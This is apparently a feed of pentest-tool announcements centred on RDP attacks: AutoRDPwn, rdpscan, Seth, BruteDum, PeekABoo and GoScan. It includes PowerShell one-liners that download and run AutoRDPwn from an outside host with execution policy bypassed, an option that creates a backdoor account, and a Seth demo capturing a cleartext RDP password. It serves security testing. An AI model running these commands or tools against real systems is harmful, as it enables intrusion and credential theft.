AutoRDPwn v5.0 – The Shadow Attack Framework

AutoRDPwn is a post-exploitation framework created in PowerShell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view the victim's desktop without consent, and even control it on demand, using tools native to the operating system itself.

Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this through a completely intuitive menu in seven different languages.

Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.

Requirements

PowerShell 4.0 or higher

Changes

Version 5.0
• New logo completely redesigned from scratch
• Full translation in 7 languages: es, en, fr, de, it, ru, pt
• Remote execution through a reverse shell with UAC and AMSI bypass
• Partial support from Linux (more information in the user guide)
• Improved remote execution (an internet connection is no longer necessary on the victim)
• New section available: Backdoors and persistence
• New module available: Remote Keylogger
• New section available: Privilege escalation
• New module available: Obtain information from the operating system
• New module available: Search vulnerabilities with Sherlock
• New module available: Escalate privileges with PowerUp
• New section available: Other Modules
• New module available: Execute an external script
*The rest of the changes can be consulted in the CHANGELOG file

Use

This application can be used locally, remotely or to pivot between computers. When used remotely in a reverse shell, it is necessary to use the following parameters:

-admin / -noadmin -> Depending on the permissions we have, we will use one or the other
-nogui -> This will avoid loading the menu and some colors, guaranteeing its functionality
-lang -> We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese)
-option -> As with the menu, we can choose how to launch the attack
-shadow -> We will decide if we want to see or control the remote device
-createuser -> This parameter is optional; the user AutoRDPwn (password: AutoRDPwn) will be created on the victim machine

Local execution on one line:

    powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

Example of remote execution on one line:

    powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"

The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshots

Credits and Acknowledgments

This framework uses the following scripts and tools:
• Chachi-Enumerator by Luis Vacas -> https://github.com/Hackplayers/PsCabesha-tools
• Get-System by HarmJ0y & Matt Graeber -> https://github.com/HarmJ0y/Misc-PowerShell
• Invoke-DCOM by Steve Borosh -> https://github.com/rvrsh3ll/Misc-Powershell-Scripts
• Invoke-MetasploitPayload by Jared Haight -> https://github.com/jaredhaight/Invoke-MetasploitPayload
• Invoke-Phant0m by Halil Dalabasmaz -> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp by Nikhil "SamratAshok" Mittal -> https://github.com/samratashok/nishang
• Invoke-TheHash by Kevin Robertson -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz by Benjamin Delpy -> https://github.com/gentilkiwi/mimikatz
• PsExec by Mark Russinovich -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper by Stas'M Corp. -> https://github.com/stascorp/rdpwrap
• SessionGopher by Brandon Arvanaghi -> https://github.com/Arvanaghi/SessionGopher
And many more that do not fit here. Thanks to all of them and their excellent work.

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can contact through info@darkbyte.net

Download AutoRDPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/zJ75MJYF2V8/autordpwn-v50-shadow-attack-framework.html

Rdpscan – A Quick Scanner For The CVE-2019-0708 “BlueKeep” Vulnerability

This is a quick-and-dirty scanner for the CVE-2019-0708 vulnerability in Microsoft Remote Desktop. Right now, there are about 900,000 machines on the public Internet vulnerable to this vulnerability, so many expect a worm soon, like WannaCry and notPetya. Therefore, scan your networks and patch (or at least enable NLA) on vulnerable systems.

This is a command-line tool. You can download the source and compile it yourself, or you can download one of the pre-compiled binaries for Windows or macOS from the link above.

This tool is based entirely on the rdesktop patch from https://github.com/zerosum0x0/CVE-2019-0708.

Primary use

To scan a network, run it like the following:

    rdpscan 192.168.1.1-192.168.1.255

This produces one of 3 results for each address:
- SAFE - if the target has been determined to be patched, or at least to require CredSSP/NLA
- VULNERABLE - if the target has been confirmed to be vulnerable
- UNKNOWN - if the target doesn't respond or has some protocol failure

When nothing exists at a target IP address, the older versions printed the message "UNKNOWN - connection timed out". When scanning large networks, this produces an overload of information about systems you don't care about. Therefore, the new version by default doesn't produce this information unless you add -v (for verbose) on the command line.

You can increase the speed at which it scans large networks by increasing the number of workers:

    rdpscan --workers 10000 10.0.0.0/8

However, on my computer, it only produces about 1500 workers, because of system limitations, no matter how high I configure this parameter.

You can increase the speed even more by using this in conjunction with masscan, described in the section below.

Interpreting the results

There are three general responses:
- SAFE - which means the target is probably patched or otherwise not vulnerable to the bug.
- VULNERABLE - which means we've confirmed the target is vulnerable to this bug, and that when the worm hits, it will likely get infected.
- UNKNOWN - means we can't confirm either way, usually because the target doesn't respond or isn't running RDP, which is the vast majority of responses. Also, when targets are out of resources or experiencing network problems, we'll get a lot of these. Finally, protocol errors are responsible for a lot.

While the three main responses are SAFE, VULNERABLE, and UNKNOWN, they contain additional text explaining the diagnosis. This section describes the various strings you'll see.

SAFE

There are three main reasons we think a target is safe:

SAFE - Target appears patched
This happens when the target doesn't respond to the triggering request. This means it's a Windows system that's been patched, or a system that wasn't vulnerable to begin with, like Windows 10 or Unix.

SAFE - CredSSP/NLA required
This means that the target first requires Network Level Authentication before the RDP connection can be established. The tool cannot pass this point without legitimate credentials, so it cannot determine whether the target has been patched. However, hackers can't continue past this point to exploit vulnerable systems either, so you are likely "safe". However, when exploits appear, insiders with valid usernames/passwords will be able to exploit the system if it's unpatched.

SAFE - not RDP
This means the system is not RDP, but has some other service that happens to use this same port, and produces a response that's clearly not RDP. Common examples are HTTP and SSH. Note however that instead of an identifiable protocol, a server may respond with a RST or FIN packet. These are identified as UNKNOWN instead of SAFE/VULNERABLE.

VULNERABLE

This means we've confirmed the system is vulnerable to the bug.

VULNERABLE - got appid
There is only one response when the system is vulnerable, this one.

UNKNOWN

There are a zillion variations for unknown.

UNKNOWN - no connection - timeout
This is by far the most common response, and happens when the target IP address makes no response whatsoever. In fact, it's so common that when scanning large ranges of addresses, it's usually omitted. You have to add the -v (verbose) flag in order to enable it.

UNKNOWN - no connection - refused (RST)
This is by far the second most common response, and happens when the target exists and responds to network traffic, but isn't running RDP, so refuses the connection with a TCP RST packet.

UNKNOWN - RDP protocol error - receive timeout
This is the third most common response, and happens when we've successfully established an RDP connection, but then the server stops responding to us. This is due to network errors and when the target system is overloaded for some reason. It could also be network errors on this end, such as when you are behind a NAT and overloading it with too many connections.

UNKNOWN - no connection - connection closed
This means we've established a connection (TCP SYN-ACK), but then the connection is immediately closed (with a RST or FIN). There are many reasons this happens, which we cannot distinguish:
- It's running RDP, but for some reason closes the connection, possibly because it's out of resources.
- It's not RDP, and doesn't like the RDP request we send it, so instead of sending us a nice error message (which would trigger SAFE - not RDP), it abruptly closes the connection.
- Some intervening device, like an IPS, firewall, or NAT, closed the connection because it identified this as hostile, or ran out of resources.
- Some other reason I haven't identified; there's a lot of weird stuff happening when I scan the Internet.

UNKNOWN - no connection - host unreachable (ICMP error)
The remote network reports the host cannot be reached or is not running. Try again later if you think that host should be alive.

UNKNOWN - no connection - network unreachable (ICMP error)
There is a (transient) network error on the far end; try again later if you believe that network should be running.

UNKNOWN - RDP protocol error
This means some corruption happened in the RDP protocol, either because the remote side implements it wrong (not a Windows system), because it's handling a transient network error badly, or something else.

UNKNOWN - SSL protocol error
Since Windows Vista, RDP uses the STARTTLS protocol to run over SSL. This layer has its own problems like above, which include handling underlying network errors badly, or trying to communicate with systems that have some sort of incompatibility. If you get a very long error message here (like SSL3_GET_RECORD:wrong version), it's because the other side has a bug in SSL, or the SSL library that you are using has a bug.

Using with masscan

This rdpscan tool is fairly slow, only scanning a few hundred targets per second. You can instead use masscan to speed things up. The masscan tool is roughly 1000 times faster, but only gives limited information on the target.

The steps are:
1. First scan the address ranges with masscan to quickly find hosts that respond on port 3389 (or whatever port you use).
2. Second, feed the output of masscan into rdpscan, so it only has to scan targets we know are active.

The simple way to run this is just to combine them on the command line:

    masscan 10.0.0.0/8 -p3389 | rdpscan --file -

The way I do it is in two steps:

    masscan 10.0.0.0/8 -p3389 > ips.txt
    rdpscan --file ips.txt --workers 10000 > results.txt

Building

The difficult part is getting the OpenSSL libraries installed, and not conflicting with other versions on the system. Some examples for versions of Linux I've tested on are the following, but they keep changing package names from one distribution to the next. Also, there are many options for an OpenSSL-compatible API, such as BoringSSL and LibreSSL.

    $ sudo apt install libssl-dev
    $ sudo yum install openssl-devel

Once you've solved that problem, you just compile all the .c files together like this:

    $ gcc *.c -lssl -lcrypto -o rdpscan

I've put a Makefile in the directory that does this, so you can likely do just:

    $ make

The code is written in C, so it needs a C compiler installed, such as by doing the following:

    $ sudo apt install build-essential

Common build errors

This section describes the more obvious build errors.

    ssl.h:24:25: fatal error: openssl/rc4.h: No such file or directory

This means you either don't have the OpenSSL headers installed, or they aren't in a path somewhere. Remember that even if you have OpenSSL binaries installed, this doesn't mean you've got the development stuff installed. You need both the headers and libraries installed.

To install these things on Debian, do:

    $ sudo apt install libssl-dev

To fix the path issue, add a compilation flag -I/usr/local/include, or something similar.

An example linker problem is the following:

    Undefined symbols for architecture x86_64:
      "_OPENSSL_init_ssl", referenced from:
          _tcp_tls_connect in tcp-fac73c.o
      "_RSA_get0_key", referenced from:
          _rdssl_rkey_get_exp_mod in ssl-d5fdf5.o
      "_SSL_CTX_set_options", referenced from:
          _tcp_tls_connect in tcp-fac73c.o
      "_X509_get_X509_PUBKEY", referenced from:
          _rdssl_cert_to_rkey in ssl-d5fdf5.o

I get this on macOS because there are multiple versions of OpenSSL. I fix this by hard-coding the paths:

    $ gcc *.c -lssl -lcrypto -I/usr/local/include -L/usr/local/lib -o rdpscan

According to comments by others, the following command line might work on macOS if you've used Homebrew to install things. I still get the linking errors above, though, because I've installed other OpenSSL components that are conflicting.

    gcc $(brew --prefix)/opt/openssl/lib/libssl.a $(brew --prefix)/opt/openssl/lib/libcrypto.a -o rdpscan *.c

Running

The section above gives quickstart tips for running the program. This section gives more in-depth help.

To scan a single target, just pass the address of the target:

    ./rdpscan 192.168.10.101

You can pass in IPv6 addresses and DNS names. You can pass in multiple targets. An example of this would be:

    ./rdpscan 192.168.10.101 exchange.example.com 2001:0db8:85a3::1

You can also scan ranges of addresses, using either begin-end IPv4 addresses, or IPv4 CIDR spec. IPv6 ranges aren't supported because they are so big.

    ./rdpscan 10.0.0.1-10.0.0.25 192.168.0.0/16

By default, it scans only 100 targets at a time. You can increase this number with the --workers parameter. However, no matter how high you set this parameter, in practice you'll get a max of around 500 to 1500 workers running at once, depending upon your system.

    ./rdpscan --workers 1000 10.0.0.0/24

Instead of specifying targets on the command line, you can load them from a file instead, using the well-named --file parameter:

    ./rdpscan --file ips.txt

The format of the file is one address, name, or range per line. It can also consume the text generated by masscan. Extra whitespace is trimmed, blank lines are ignored, and any comment lines are ignored. A comment is a line starting with the # character, or // characters.

The output is sent to stdout giving the status of VULNERABLE, SAFE, or UNKNOWN. There could be additional reasons for each. These reasons are described above.

    211.101.37.250 - SAFE - CredSSP/NLA required
    185.11.124.79 - SAFE - not RDP - SSH response seen
    125.121.137.42 - UNKNOWN - no connection - refused (RST)
    40.117.191.215 - SAFE - CredSSP/NLA required
    121.204.186.182 - SAFE - CredSSP/NLA required
    99.8.11.148 - SAFE - CredSSP/NLA required
    121.204.186.114 - SAFE - CredSSP/NLA required
    49.50.145.236 - SAFE - CredSSP/NLA required
    106.12.74.155 - VULNERABLE - got appid
    222.84.253.26 - SAFE - CredSSP/NLA required
    144.35.133.109 - UNKNOWN - RDP protocol error - receive timeout
    199.212.226.196 - UNKNOWN - RDP protocol error - receive timeout
    183.134.58.152 - UNKNOWN - no connection - refused (RST)
    83.162.246.149 - VULNERABLE - got appid

You can process this with additional Unix commands like grep and cut. To get a list of just vulnerable machines:

    ./rdpscan 10.0.0.0/8 | grep 'VULN' | cut -f1 -d'-'

The parameter -dddd means diagnostic information, where the more ds you add, the more details are printed. This is sent to stderr instead of stdout so that you can separate the streams. Using bash this is done like this:

    ./rdpscan --file myips.txt -ddd 2> diag.txt 1> results.txt

Diagnostic info

Adding the -d parameter dumps diagnostic info on the connections to stderr.

    ./rdpscan 62.15.34.157 -d
    [+] [62.15.34.157]:3389 - connecting...
    [+] [62.15.34.157]:3389 - connected from [10.1.10.133]:49211
    [+] [62.15.34.157]:3389 - SSL connection
    [+] [62.15.34.157]:3389 - version = v4.8
    [+] [62.15.34.157]:3389 - Sending MS_T120 check packet
    [-] [62.15.34.157]:3389 - Max sends reached, waiting...
    62.15.34.157 - SAFE - Target appears patched

On macOS/Linux, you can redirect stdout and stderr separately to different files in the usual manner:

    ./rdpscan --file ips.txt 2> diag.txt 1> results.txt

SOCKS5 and Tor lulz

So it includes SOCKS5 support:

    ./rdpscan --file ips.txt --socks5 localhost --socks5port 9050

It makes connection problems worse, so you get a lot more "UNKNOWN" results.

Statically link OpenSSL

For releasing the Windows and macOS binaries attached as releases to this project, I statically link OpenSSL, so that it doesn't need to be included separately and the programs just work. This section describes some notes on how to do this, especially since the description on OpenSSL's own page seems to be out of date.

Both these steps start with downloading the OpenSSL source and putting it next to the rdpscan directory:

    git clone https://github.com/openssl/openssl

Windows

For Windows, you need to first install some version of Perl. I use the one from ActiveState.

Next, you'll need a special "assembler". I use the recommended one called NASM.

Next, you'll need a compiler. I use Visual Studio 2010. You can download the latest "Visual Studio Community Edition" (which is 2019) instead from Microsoft.

Now you need to build the makefile. This is done by going into the OpenSSL directory and running the Configure Perl program:

    perl Configure VC-WIN32

I chose 32-bit for Windows because there's a lot of old Windows out there, and I want to make the program as compatible as possible with old versions.

I want a completely static build, including the C runtime. To do that, I opened the resulting makefile in an editor, and changed the C compilation flag from /MD (meaning use DLLs) to /MT. While I was there, I added -D_WIN32_WINNT=0x501 to the CPPFLAGS, which restricts OpenSSL to features that work back on Windows XP and Server 2003. Otherwise, you get errors that bcrypt.dll was not found if you run on those older systems.

Now you'll need to make sure everything is in your path. I copied nasm.exe to a directory in the PATH. For Visual Studio 2010, I ran the program vcvars32.bat to set up the path variables for the compiler.

At this point on the command line, I typed:

    nmake

This makes the libraries. The static ones are libssl_static.lib and libcrypto_static.lib, which I use to link to in rdpscan.

macOS

First of all, you need to install a compiler. I use the Developer Tools from Apple, installing Xcode and the compiler. I think you can use Homebrew to install gcc instead.

Then go into the source directory for OpenSSL and create a makefile:

    perl Configure darwin64-x86_64-cc

Now simply make it:

    make depend
    make

At this point, it's created both dynamic (.dylib) and static (.lib) libraries. I deleted the dynamic libraries so that it'll catch the static ones by default.

Now in rdpscan, just build the macOS makefile:

    make -f Makefile.macos

This will compile all the rdpscan source files, then link to the OpenSSL libraries in the directory ../openssl that you just built.

This should produce a 3-megabyte executable. If you instead only got a 200-kilobyte executable, then you made a mistake and linked to the dynamic libraries instead.

Download Rdpscan
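The grep/cut one-liner above is enough to pull out the VULNERABLE addresses, but when triaging a real results file you usually want three lists: what to patch now, what to rescan later, and a tally per status. The following bash helper is an added example written for this page; it is not part of rdpscan. It assumes the "<address> - <STATUS> - <reason>" line format shown in the README (this page renders the separator as a dash), and the sample lines are constructed in documentation address space rather than real scan results. The rescan list applies the README's own interpretation: RST refusals mean nothing is listening for RDP on that port, so they are excluded, while receive timeouts and similar transient errors are kept for a second pass.

```shell
#!/usr/bin/env bash
# Triage helper for rdpscan results. Added example, not part of rdpscan; it assumes
# the "<address> - <STATUS> - <reason>" line format shown in the README above.

# Constructed sample in documentation address space (RFC 5737), not real scan results.
SAMPLE_RESULTS='203.0.113.10 - SAFE - CredSSP/NLA required
203.0.113.11 - SAFE - not RDP - SSH response seen
203.0.113.12 - UNKNOWN - no connection - refused (RST)
203.0.113.13 - VULNERABLE - got appid
203.0.113.14 - UNKNOWN - RDP protocol error - receive timeout
203.0.113.15 - VULNERABLE - got appid
203.0.113.16 - SAFE - Target appears patched'

# Hosts confirmed VULNERABLE: patch (or at least enable NLA) on these first.
# Splitting on " - " rather than "-" keeps multi-part reasons such as
# "not RDP - SSH response seen" from shifting the status field.
vulnerable_hosts() {
  awk -F' - ' '$2 == "VULNERABLE" { print $1 }'
}

# UNKNOWN results worth rescanning later (receive timeouts, ICMP errors, closed
# connections). RST refusals are dropped: the README attributes them to hosts that
# are up but not running RDP on that port, so a second pass adds nothing.
retry_hosts() {
  awk -F' - ' '$2 == "UNKNOWN" && $0 !~ /refused \(RST\)/ { print $1 }'
}

# Tally the three top-level statuses; sorted so the output is stable.
summarize() {
  awk -F' - ' 'NF >= 2 { count[$2]++ }
               END { for (s in count) printf "%s %d\n", s, count[s] }' | LC_ALL=C sort
}

# Stand-alone demonstration on the constructed sample. In practice, pipe the
# real output in instead, e.g.: rdpscan --file ips.txt | vulnerable_hosts
printf '%s\n' "$SAMPLE_RESULTS" | summarize
echo '--- patch first:'
printf '%s\n' "$SAMPLE_RESULTS" | vulnerable_hosts
echo '--- rescan later:'
printf '%s\n' "$SAMPLE_RESULTS" | retry_hosts
```

Because rdpscan writes diagnostics to stderr and results to stdout, the functions can be fed directly from a live scan (`rdpscan --file ips.txt 2> diag.txt | vulnerable_hosts`) or from a saved results.txt; the rescan list can be written back to a file and given to `--file` on the next run.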

Link: http://feedproxy.google.com/~r/PentestTools/~3/mCI0mRVoYKo/rdpscan-quick-scanner-for-cve-2019-0708.html

Seth – Perform A MitM Attack And Extract Clear Text Credentials From RDP Connections

Seth is a tool written in Python and Bash to MitM RDP connections by attempting to downgrade the connection in order to extract clear text credentials. It was developed to raise awareness and educate about the importance of properly configured RDP connections in the context of pentests, workshops or talks. The author is Adrian Vollmer (SySS GmbH).

Usage

Run it like this:

    $ ./seth.sh <ATTACKER IP> <VICTIM IP> <GATEWAY IP|HOST IP> [<COMMAND>]

Unless the RDP host is on the same subnet as the victim machine, the last IP address must be that of the gateway.

The last parameter is optional. It can contain a command that is executed on the RDP host by simulating WIN+R via key press event injection. Keystroke injection depends on which keyboard layout the victim is using; currently it's only reliable with the English US layout. I suggest avoiding special characters by using powershell -enc <STRING>, where STRING is your UTF-16LE and Base64 encoded command. However, calc should be pretty universal and gets the job done.

The shell script performs ARP spoofing to gain a Man-in-the-Middle position and redirects the traffic such that it runs through an RDP proxy. The proxy can be called separately. This can be useful if you want to use Seth in combination with Responder. Use Responder to gain a Man-in-the-Middle position and run Seth at the same time. Run seth.py -h for more information:

    usage: seth.py [-h] [-d] [-f] [-p LISTEN_PORT] [-b BIND_IP] [-g {0,1,3,11}]
                   [-j INJECT] -c CERTFILE -k KEYFILE
                   target_host [target_port]

    RDP credential sniffer -- Adrian Vollmer, SySS GmbH 2017

    positional arguments:
      target_host           target host of the RDP service
      target_port           TCP port of the target RDP service (default 3389)

    optional arguments:
      -h, --help            show this help message and exit
      -d, --debug           show debug information
      -f, --fake-server     perform a 'fake server' attack
      -p LISTEN_PORT, --listen-port LISTEN_PORT
                            TCP port to listen on (default 3389)
      -b BIND_IP, --bind-ip BIND_IP
                            IP address to bind the fake service to (default all)
      -g {0,1,3,11}, --downgrade {0,1,3,11}
                            downgrade the authentication protocol to this (default 3)
      -j INJECT, --inject INJECT
                            command to execute via key press event injection
      -c CERTFILE, --certfile CERTFILE
                            path to the certificate file
      -k KEYFILE, --keyfile KEYFILE
                            path to the key file

For more information read the PDF in doc/paper (or read the code!). The paper also contains recommendations for countermeasures.

You can also watch a twenty minute presentation including a demo (starting at 14:00) on YouTube: https://www.youtube.com/watch?v=wdPkY7gykf4

Or watch just the demo (with subtitles) here: https://www.youtube.com/watch?v=JvvxTNrKV-s

Demo

The following output shows the attacker's view. Seth sniffs an offline crackable hash as well as the clear text password. Here, NLA is not enforced and the victim ignored the certificate warning.

    # ./seth.sh eth1 192.168.57.{103,2,102}
    [Seth ASCII banner: by Adrian Vollmer, seth@vollmer.syss.de, SySS GmbH, 2017, https://www.syss.de]
    [*] Spoofing arp replies...
    [*] Turning on IP forwarding...
    [*] Set iptables rules for SYN packets...
    [*] Waiting for a SYN packet to the original destination...
    [+] Got it! Original destination is 192.168.57.102
    [*] Clone the x509 certificate of the original destination...
    [*] Adjust the iptables rule for all packets...
    [*] Run RDP proxy...
    Listening for new connection
    Connection received from 192.168.57.103:50431
    Downgrading authentication options from 11 to 3
    Enable SSL
    alice::avollmer-syss:1f20645749b0dfd5:b0d3d5f1642c05764ca28450f89d38db:[...] with NTLM response
    TLS alert access denied, Downgrading CredSSP
    Connection lost
    Connection received from 192.168.57.103:50409
    Listening for new connection
    Enable SSL
    Connection lost
    Connection received from 192.168.57.103:50410
    Listening for new connection
    Enable SSL
    Hiding forged protocol request from client
    .\alice:ilovebob
    Keyboard Layout: 0x409 (English_United_States)
    Key press: LShift
    Key press: S
    Key release: S
    Key release: LShift
    Key press: E
    Key release: E
    Key press: C
    Key release: C
    Key press: R
    Key release: R
    Key press: E
    Key release: E
    Key press: T
    Key release: T
    Connection lost
    [*] Cleaning up...
    [*] Done.

Requirements
- python3
- tcpdump
- arpspoof (part of dsniff)
- openssl

Disclaimer

Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only.

Download Seth

Link: http://feedproxy.google.com/~r/PentestTools/~3/otGqqcWw2mo/seth-perform-mitm-attack-and-extract.html

June 11, 2019 – Hack Naked News #222

    This week, a botnet that's targeting 1.5 million RDP servers worldwide, VLC Player gets patched for two highly severe bugs, thousands of images stolen from US border hack, Troy Hunt looks to sell Have I Been Pwned, and a near-ubiquitous critical Microsoft RCE bug affects all versions of Windows! In the expert commentary, we […]
The post June 11, 2019 – Hack Naked News #222 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/XTNKRLVVb2k/

MacOS Catalina, OpenShift, & Pink Floyd – Application Security Weekly #64

    “Waiting for the worms to come.” — Pink Floyd and RDP's CVE-2019-0708. Even the NSA warns about the population of exposed systems, a patch commands attention for mail servers, in macOS Catalina and iOS 13 Apple finds a way to find devices and not lose privacy, iOS App Transport Security has strong benefits, […]
The post MacOS Catalina, OpenShift, & Pink Floyd – Application Security Weekly #64 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/Ec-nE4cPIls/

BruteDum – Brute Force Attacks SSH, FTP, Telnet, PostgreSQL, RDP, VNC With Hydra, Medusa And Ncrack

BruteDum is an SSH, FTP, Telnet, PostgreSQL, RDP, VNC brute forcing tool with Hydra, Medusa and Ncrack. BruteDum can work with any Linux distro if it has Python 3.

Features of BruteDum
- SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Hydra (recommended)
- SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Medusa
- SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Ncrack
- Scan victim's ports with Nmap

Install and run on Linux

You have to install Python 3 first:
- Install Python 3 on Arch Linux and its distros: sudo pacman -S python3
- Install Python 3 on Debian and its distros: sudo apt install python3

You have to install Hydra, Medusa, Nmap and Ncrack too:
- On Arch Linux and its distros: sudo pacman -S nmap hydra medusa ncrack
- On Debian and its distros: sudo apt install nmap hydra medusa ncrack

Then clone and run:

    git clone https://github.com/GitHackTools/BruteDum
    cd BruteDum
    python3 brutedum.py

Screenshots

Scanning victim's ports with Nmap
Ready to brute force
Brute force has finished

Contact
Twitter: @SecureGF

Download BruteDum

Link: http://feedproxy.google.com/~r/PentestTools/~3/3Z-_-kI5aD8/brutedum-brute-force-attacks-ssh-ftp.html

PeekABoo – Tool To Enable Remote Desktop On The Targeted Machine

PeekABoo tool can be used during internal penetration testing when a user needs to enable Remote Desktop on the targeted machine. It uses PowerShell remoting to perform this task.

The tool only works if WinRM is enabled. Since Windows Server 2012, WinRM is enabled by default on all Windows server operating systems, but not on client operating systems.

Note: Remote Desktop is disabled by default on all Windows operating systems. The user would require the local administrator password or administrator privileges on the server to enable RDP on a targeted machine.

Screenshots

Targeted machine on an internal network has RDP disabled:
Enabling remote desktop service on a targeted machine by pressing option 2:
Successfully enabled remote desktop service on a targeted machine:

How to install?
- git clone https://github.com/Viralmaniar/PeekABoo.git
- cd PeekABoo
- python peekaboo.py

How do I use this?
Press 1: This will set PowerShell to unrestricted mode.
Press 2: It enables Remote Desktop on the targeted machine and shows the RDP port (3389) status.
Press 3: It disables Remote Desktop on the targeted machine.
Press 4: To exit from the program.

My Windows machine does not have Python installed, what should I do?

Download an exe from the release section of the GitHub repository along with the PowerShell files available here, or build it on your own using PyInstaller after reviewing the source code. Compile peekaboo.py into an executable using PyInstaller. PyInstaller is available on PyPI. You can install it through pip:

    pip install pyinstaller

Questions?
Twitter: https://twitter.com/maniarviral
LinkedIn: https://au.linkedin.com/in/viralmaniar

Download PeekABoo

Link: http://feedproxy.google.com/~r/PentestTools/~3/pKwJLmFuw_Y/peekaboo-tool-to-enable-remote-desktop.html

Goscan – Interactive Network Scanner

GoScan is an interactive network scanner client, featuring auto-completion, which provides abstraction and automation over nmap.

Although it started as a small side-project I developed in order to learn @golang, GoScan can now be used to perform host discovery, port scanning, and service enumeration not only in situations where being stealthy is not a priority and time is limited (think of CTFs, OSCP, exams, etc.), but also (with a few tweaks in its configuration) during professional engagements.

GoScan is also particularly suited for unstable environments (think unreliable network connectivity, lack of "screen", etc.), given that it fires scans and maintains their state in an SQLite database. Scans run in the background (detached from the main thread), so even if the connection to the box running GoScan is lost, results can be uploaded asynchronously (more on this below). That is, data can be imported into GoScan at different stages of the process, without the need to restart the entire process from scratch if something goes wrong.

In addition, the Service Enumeration phase integrates a collection of other tools (e.g., EyeWitness, Hydra, nikto, etc.), each one tailored to target a specific service.

Installation

Binary installation (Recommended)

Binaries are available from the Release page.

    # Linux (64bit)
    $ wget https://github.com/marco-lancini/goscan/releases/download/v2.3/goscan_2.3_linux_amd64.zip
    $ unzip goscan_2.3_linux_amd64.zip

    # Linux (32bit)
    $ wget https://github.com/marco-lancini/goscan/releases/download/v2.3/goscan_2.3_linux_386.zip
    $ unzip goscan_2.3_linux_386.zip

    # After that, place the executable in your PATH
    $ chmod +x goscan
    $ sudo mv ./goscan /usr/local/bin/goscan

Build from source

    $ git clone https://github.com/marco-lancini/goscan.git
    $ cd goscan/goscan/
    $ make setup
    $ make build

To create a multi-platform binary, use the cross command via make:

    $ make cross

Docker

    $ git clone https://github.com/marco-lancini/goscan.git
    $ cd goscan/
    $ docker-compose up --build

Usage

GoScan supports all the main steps of network enumeration:

1. Load targets
   - Add a single target via the CLI (must be a valid CIDR): load target SINGLE
   - Upload multiple targets from a text file or folder: load target MULTI <path-to-file>

2. Host Discovery
   - Perform a Ping Sweep: sweep <TYPE> <TARGET>
   - Or load results from a previous discovery:
     - Add a single alive host via the CLI (must be a /32): load alive SINGLE <IP>
     - Upload multiple alive hosts from a text file or folder: load alive MULTI <path-to-file>

3. Port Scanning
   - Perform a port scan: portscan <TYPE> <TARGET>
   - Or upload nmap results from XML files or folder: load portscan <path-to-file>

4. Service Enumeration
   - Dry Run (only show commands, without performing them): enumerate <TYPE> DRY <TARGET>
   - Perform enumeration of detected services: enumerate <TYPE> <POLITE/AGGRESSIVE> <TARGET>

5. Special Scans
   - EyeWitness: take screenshots of websites, RDP services, and open VNC servers (KALI ONLY): special eyewitness (EyeWitness.py needs to be in the system path)
   - Extract (Windows) domain information from enumeration data: special domain <users/hosts/servers>
   - DNS: enumerate DNS (nmap, dnsrecon, dnsenum): special dns DISCOVERY <domain>
   - Bruteforce DNS: special dns BRUTEFORCE <domain>
   - Reverse Bruteforce DNS: special dns BRUTEFORCE_REVERSE <domain> <base_IP>

Utils
   - Show results: show <targets/hosts/ports>
   - Automatically configure settings by loading a config file: set config_file <PATH>
   - Change the output folder (by default ~/goscan): set output_folder <PATH>
   - Modify the default nmap switches: set nmap_switches <SWEEP/TCP_FULL/TCP_STANDARD/TCP_VULN/UDP_STANDARD> <SWITCHES>
   - Modify the default wordlists: set_wordlists <FINGER_USER/FTP_USER/...> <PATH>

External Integrations

The Service Enumeration phase currently supports the following integrations:

    WHAT     INTEGRATION
    ARP      nmap
    DNS      nmap, dnsrecon, dnsenum, host
    FINGER   nmap, finger-user-enum
    FTP      nmap, ftp-user-enum, hydra [AGGRESSIVE]
    HTTP     nmap, nikto, dirb, EyeWitness, sqlmap [AGGRESSIVE], fimap [AGGRESSIVE]
    RDP      nmap, EyeWitness
    SMB      nmap, enum4linux, nbtscan, samrdump
    SMTP     nmap, smtp-user-enum
    SNMP     nmap, snmpcheck, onesixtyone, snmpwalk
    SSH      hydra [AGGRESSIVE]
    SQL      nmap
    VNC      EyeWitness

Download Goscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/QvZdo-L3mC8/goscan-interactive-network-scanner.html

AutoRDPwn v4.8 – The Shadow Attack Framework

AutoRDPwn is a script created in PowerShell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view the victim's desktop without consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.

Requirements

PowerShell 4.0 or higher

Changes

Version 4.8
• Compatibility with PowerShell 4.0
• Automatic copy of the content to the clipboard (passwords, hashes, dumps, etc.)
• Automatic exclusion in Windows Defender (4 different methods)
• Remote execution without password for PsExec, WMI and Invoke-Command
• New available attack: DCOM Passwordless Execution
• New available module: Remote Access / Metasploit Web Delivery
• New module available: Remote VNC Server (designed for legacy environments)
• Autocomplete the host, user and password fields by pressing Enter
• It is now possible to run the tool without administrator privileges with the -noadmin parameter
*The rest of the changes can be consulted in the CHANGELOG file

Use

